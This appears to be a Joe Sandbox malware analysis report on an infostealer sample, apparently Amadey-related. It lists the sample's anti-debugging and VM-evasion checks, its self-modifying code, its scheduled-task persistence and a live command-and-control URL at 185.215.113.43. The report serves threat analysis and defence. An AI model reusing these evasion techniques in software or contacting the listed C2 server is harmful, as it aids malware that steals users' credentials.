                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 545089B second address: 54508F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FE6E8F184C0h 0x00000012 jmp 00007FE6E8F184C5h 0x00000017 popfd 0x00000018 pushfd 0x00000019 jmp 00007FE6E8F184C0h 0x0000001e jmp 00007FE6E8F184C5h 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 54508F6 second address: 5450909 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 4CE2h 0x00000007 mov ecx, ebx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5450909 second address: 545090F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 545090F second address: 5450927 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE6E8B29094h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSpecial instruction interceptor: First address: 33EF4D instructions caused by: Self-modifying code
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSpecial instruction interceptor: First address: 4E53D9 instructions caused by: Self-modifying code
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSpecial instruction interceptor: First address: 4E3ED4 instructions caused by: Self-modifying code
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSpecial instruction interceptor: First address: 4E3B65 instructions caused by: Self-modifying code
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSpecial instruction interceptor: First address: 50967B instructions caused by: Self-modifying code
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSpecial instruction interceptor: First address: 4F1C26 instructions caused by: Self-modifying code
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSpecial instruction interceptor: First address: 56ACE0 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: C4EF4D instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: DF53D9 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: DF3ED4 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: DF3B65 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: E1967B instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: E01C26 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: E7ACE0 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeCode function: 0_2_054A0576 rdtsc 0_2_054A0576
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 827Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 495Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1343Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 810Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1226Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2508Thread sleep count: 32 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2508Thread sleep time: -64032s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2396Thread sleep count: 827 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2396Thread sleep time: -1654827s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2080Thread sleep count: 495 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2080Thread sleep time: -14850000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3684Thread sleep time: -360000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2288Thread sleep count: 1343 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2288Thread sleep time: -2687343s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2352Thread sleep count: 810 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2352Thread sleep time: -1620810s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2464Thread sleep count: 1226 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2464Thread sleep time: -2453226s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000Jump to behavior
                  Source: skotes.exe, skotes.exe, 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                  Source: skotes.exe, 00000006.00000003.2274997620.0000000001302000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2685806269.0000000001302000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWY
                  Source: UyiH4t5dph.exe, 00000000.00000003.1438883566.00000000016E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: skotes.exe, 00000006.00000002.2685806269.00000000012B7000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2685806269.00000000012F9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000003.2274997620.00000000012F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: UyiH4t5dph.exe, 00000000.00000003.1438883566.00000000016E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                  Source: UyiH4t5dph.exe, 00000000.00000002.1465347617.00000000004C0000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAPI call chain: ExitProcess graph end nodegraph_2-10276
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeSystem information queried: ModuleInformationJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeCode function: 0_2_054A0CE5 Start: 054A0D66 End: 054A0D6B0_2_054A0CE5
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_052E00AA Start: 052E0285 End: 052E00BB6_2_052E00AA
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: regmonclass
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: gbdyllo
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: procmon_window_class
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: ollydbg
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: filemonclass
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: NTICE
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: SICE
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: SIWVID
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeCode function: 0_2_054A0576 rdtsc 0_2_054A0576
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeCode function: 0_2_0030652B mov eax, dword ptr fs:[00000030h]0_2_0030652B
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeCode function: 0_2_0030A302 mov eax, dword ptr fs:[00000030h]0_2_0030A302
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00C1A302 mov eax, dword ptr fs:[00000030h]2_2_00C1A302
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00C1652B mov eax, dword ptr fs:[00000030h]2_2_00C1652B
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C1A302 mov eax, dword ptr fs:[00000030h]6_2_00C1A302
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                  Source: skotes.exe, skotes.exe, 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Program Manager
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BFDD91 cpuid 6_2_00BFDD91
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeCode function: 0_2_002ECBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,0_2_002ECBEA
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C22517 GetTimeZoneInformation,6_2_00C22517

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 2.2.skotes.exe.be0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UyiH4t5dph.exe.2d0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.skotes.exe.be0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000003.1959422053.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.1452607613.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1464681693.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.1424348425.0000000005290000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C0EC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,6_2_00C0EC48
                  Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C0DF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext,6_2_00C0DF51
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                  Command and Scripting Interpreter
                  1
                  Scheduled Task/Job
                  12
                  Process Injection
                  1
                  Masquerading
                  OS Credential Dumping2
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  1
                  Encrypted Channel
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Scheduled Task/Job
                  1
                  DLL Side-Loading
                  1
                  Scheduled Task/Job
                  251
                  Virtualization/Sandbox Evasion
                  LSASS Memory741
                  Security Software Discovery
                  Remote Desktop ProtocolData from Removable Media1
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Native API
                  Logon Script (Windows)1
                  DLL Side-Loading
                  12
                  Process Injection
                  Security Account Manager2
                  Process Discovery
                  SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Deobfuscate/Decode Files or Information
                  NTDS251
                  Virtualization/Sandbox Evasion
                  Distributed Component Object ModelInput Capture11
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                  Obfuscated Files or Information
                  LSA Secrets1
                  Application Window Discovery
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
                  Software Packing
                  Cached Domain Credentials1
                  File and Directory Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading
                  DCSync224
                  System Information Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  UyiH4t5dph.exe54%VirustotalBrowse
                  UyiH4t5dph.exe47%ReversingLabsWin32.Infostealer.Tinba
                  UyiH4t5dph.exe100%AviraTR/Crypt.TPM.Gen
                  UyiH4t5dph.exe100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe100%AviraTR/Crypt.TPM.Gen
                  C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe47%ReversingLabsWin32.Infostealer.Tinba
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  No contacted domains info
                  NameMaliciousAntivirus DetectionReputation
                  http://185.215.113.43/Zu7JuNko/index.phpfalse
                    high
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.43/Zu7JuNko/index.phpvskotes.exe, 00000006.00000002.2685806269.00000000012F9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000003.2274997620.00000000012F9000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      http://185.215.113.43/Zu7JuNko/index.phpveskotes.exe, 00000006.00000003.2274997620.00000000012E6000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        http://185.215.113.43/Zu7JuNko/index.phpTskotes.exe, 00000006.00000002.2685806269.00000000012F9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000003.2274997620.00000000012F9000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://185.215.113.43/dskotes.exe, 00000006.00000002.2685806269.00000000012B7000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://185.215.113.43/Zu7JuNko/index.php9skotes.exe, 00000006.00000002.2685806269.00000000012F9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000003.2274997620.00000000012F9000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://185.215.113.43/Zu7JuNko/index.php:skotes.exe, 00000006.00000002.2685806269.00000000012F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://185.215.113.43/Zu7JuNko/index.php8skotes.exe, 00000006.00000003.2274997620.00000000012E6000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2685806269.00000000012DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://185.215.113.43/Zu7JuNko/index.php32iskotes.exe, 00000006.00000002.2685806269.00000000012DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    http://185.215.113.43/Zu7JuNko/index.phpBskotes.exe, 00000006.00000002.2685806269.00000000012B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://185.215.113.43/Zu7JuNko/index.phpEskotes.exe, 00000006.00000002.2685806269.00000000012F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://185.215.113.43/Zu7JuNko/index.phpdedskotes.exe, 00000006.00000003.2274997620.00000000012E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://185.215.113.43/Zu7JuNko/index.phpDskotes.exe, 00000006.00000003.2274997620.00000000012E6000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2685806269.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2685806269.00000000012F9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000003.2274997620.00000000012F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://185.215.113.43/Zu7JuNko/index.phpiskotes.exe, 00000006.00000002.2685806269.00000000012DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://185.215.113.43/Zu7JuNko/index.php.WSEskotes.exe, 00000006.00000003.2274997620.00000000012E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                http://185.215.113.43/Zu7JuNko/index.phpncodedskotes.exe, 00000006.00000003.2274997620.00000000012E6000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2685806269.00000000012DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://185.215.113.43/Zu7JuNko/index.phpiPskotes.exe, 00000006.00000003.2274997620.00000000012E6000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2685806269.00000000012DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    http://185.215.113.43/Zu7JuNko/index.phplskotes.exe, 00000006.00000003.2274997620.00000000012E6000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2685806269.00000000012DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://185.215.113.43/Zu7JuNko/index.phpcoded8skotes.exe, 00000006.00000002.2685806269.00000000012DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        185.215.113.43
                                                        unknownPortugal
                                                        206894WHOLESALECONNECTIONSNLtrue
                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1578883
                                                        Start date and time:2024-12-20 16:07:11 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 6m 48s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:9
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:UyiH4t5dph.exe
                                                        renamed because original name is a hash value
                                                        Original Sample Name:9d38889192a887e1128ec41dd417fb6d.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@4/3@0/1
                                                        EGA Information:
                                                        • Successful, ratio: 100%
                                                        HCA Information:Failed
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                        • Excluded IPs from analysis (whitelisted): 20.12.23.50
                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        TimeTypeDescription
                                                        10:09:01API Interceptor516209x Sleep call for process: skotes.exe modified
                                                        16:08:08Task SchedulerRun new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        185.215.113.43file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                        • 185.215.113.43/Zu7JuNko/index.php
                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                        • 185.215.113.43/Zu7JuNko/index.php
                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, zgRATBrowse
                                                        • 185.215.113.43/Zu7JuNko/index.php
                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                        • 185.215.113.43/Zu7JuNko/index.php
                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                        • 185.215.113.43/Zu7JuNko/index.php
                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                        • 185.215.113.43/Zu7JuNko/index.php
                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                        • 185.215.113.43/Zu7JuNko/index.php
                                                        file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, LummaC StealerBrowse
                                                        • 185.215.113.43/Zu7JuNko/index.php
                                                        file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                        • 185.215.113.43/Zu7JuNko/index.php
                                                        Tii6ue74NB.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, VidarBrowse
                                                        • 185.215.113.43/Zu7JuNko/index.php
                                                        No context
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        WHOLESALECONNECTIONSNLRZnZbS97dD.exeGet hashmaliciousLummaCBrowse
                                                        • 185.215.113.16
                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                        • 185.215.113.43
                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                        • 185.215.113.43
                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, zgRATBrowse
                                                        • 185.215.113.206
                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                        • 185.215.113.43
                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                        • 185.215.113.43
                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                        • 185.215.113.43
                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                        • 185.215.113.16
                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                        • 185.215.113.206
                                                        file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog StealerBrowse
                                                        • 185.215.113.16
                                                        No context
                                                        No context
